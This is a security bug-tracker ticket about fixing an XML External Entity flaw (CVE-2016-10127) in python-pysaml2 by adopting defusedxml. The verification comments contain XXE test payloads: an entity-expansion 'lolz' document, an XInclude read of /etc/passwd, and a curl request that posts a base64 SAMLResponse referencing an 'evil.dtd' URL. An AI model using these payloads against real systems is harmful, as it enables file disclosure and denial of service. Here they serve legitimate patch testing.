First Last Prev Next    This bug is not in your last search results.
Bug 43393 - python-pysaml2: XML External Entity issue (4.1)
python-pysaml2: XML External Entity issue (4.1)
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: Security updates
UCS 4.1
Other Linux
: P5 normal (vote)
: UCS 4.1-4-errata
Assigned To: Arvid Requate
Florian Best
:
: 43315 (view as bug list)
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2017-01-21 19:20 CET by Arvid Requate
Modified: 2019-06-06 12:55 CEST (History)
2 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score: 7.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
requate: Patch_Available+

Attachments
CVE-2016-10127_fix-xxe-in-xml-parsing.patch (8.54 KB, patch)
2017-01-21 19:20 CET, Arvid Requate 		Details | Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Arvid Requate univentionstaff 2017-01-21 19:20:51 CET 
Created attachment 8362 [details]
CVE-2016-10127_fix-xxe-in-xml-parsing.patch

Upstream Debian Jessie package version 2.0.0-1+deb8u1 fixes this issue:

Matias P. Brutti discovered that python-pysaml2, a Python implementation of the Security Assertion Markup Language 2.0, did not correctly sanitize the XML messages it handled. This allowed a remote attacker to perform XML External Entity attacks, leading to a wide range of exploits (CVE-2016-10127)

In UCS 4.1 we have version 2.4.0-2.
Comment 1 Florian Best univentionstaff 2017-01-21 21:28:54 CET 
*** Bug 43315 has been marked as a duplicate of this bug. ***
Comment 2 Florian Best univentionstaff 2017-01-21 21:33:41 CET 
We need to cherry-pick https://packages.debian.org/de/jessie/python-defusedxml.
Comment 3 Arvid Requate univentionstaff 2017-02-14 23:39:24 CET 
* repo_admin.py -U -d jessie -r 4.1-0-0 -s errata4.1-4 -p defusedxml

Successful build
Package: defusedxml
Version: 0.4.1-2.1.201702142211
Branch: ucs_4.1-0
Scope: errata4.1-4


* repo_admin.py --cherrypick --release 4.1-0 \
  --releasedest 4.1-0 --dest errata4.1-4 --package python-pysaml2

Package: python-pysaml2
Version: 2.4.0-2.4.201702142305
Branch: ucs_4.1-0
Scope: errata4.1-4
= /var/univention/buildsystem2/logs/ucs_4.1-0-0-errata4.1-4/python-pysaml2_2.4.0-2.4.201702142305.log.bz2


* Comparing the log file with the UCS 4.1-0 build looks ok. The 6 new test cases run successfully.

* python-defusedxml has been added to the ucs_4.1-0-ucs4.1-4.txt trigger list as described in the Wiki (Errata-Updates). The package is now listed in buildsystem2/cd-contents/ucs_4.1-4_*.maintained

* Advisories: defusedxml.yaml, python-pysaml2.yaml
Comment 4 Florian Best univentionstaff 2017-02-15 13:07:36 CET 
OK: grep ElementTree $(dpkg -L python-pysaml2 | sort) 2>/dev/null | grep fromstring | grep -v defusedxml

OK:
>>> import saml2
>>> xml = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n]>\n<lolz>&lol1;</lolz>\n'
>>> saml2.create_class_from_xml_string(None, xml)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/saml2/__init__.py", line 86, in create_class_from_xml_string
    tree = defusedxml.ElementTree.fromstring(xml_string)
  File "/usr/lib/python2.7/dist-packages/defusedxml/common.py", line 159, in fromstring
    parser.feed(text)
  File "/usr/lib/python2.7/xml/etree/ElementTree.py", line 1641, in feed
    self._parser.Parse(data, 0)
  File "/usr/lib/python2.7/dist-packages/defusedxml/ElementTree.py", line 95, in defused_entity_decl
    raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)
defusedxml.common.EntitiesForbidden: EntitiesForbidden(name='lol', system_id=None, public_id=None)

OK: not possible to get file contents with e.g.:
<root xmlns:xi="http://www.w3.org/2001/XInclude">\n  <xi:include href="/etc/passwd" parse="text" />\n</root>

OK: SAML login and logout via UMC still works
OK: ucs-test -s saml -E dangerous
Comment 5 Florian Best univentionstaff 2017-02-15 19:44:33 CET 
Just for myself:

urllib.quote('''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'''.encode('base64').strip())

curl -ik 'https://xen3.school.local/univention/saml/' -H 'Content-Type: application/x-www-form-urlencoded' --data 'SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgcm9vdCBbIDwh%0ARU5USVRZICUgcGF5bG9hZCBTWVNURU0gImh0dHA6Ly9sb2NhbGhvc3Q6ODAwMC9ldmlsLmR0ZCI%2B%0AICVwYXlsb2FkO10%2B'
First Last Prev Next    This bug is not in your last search results.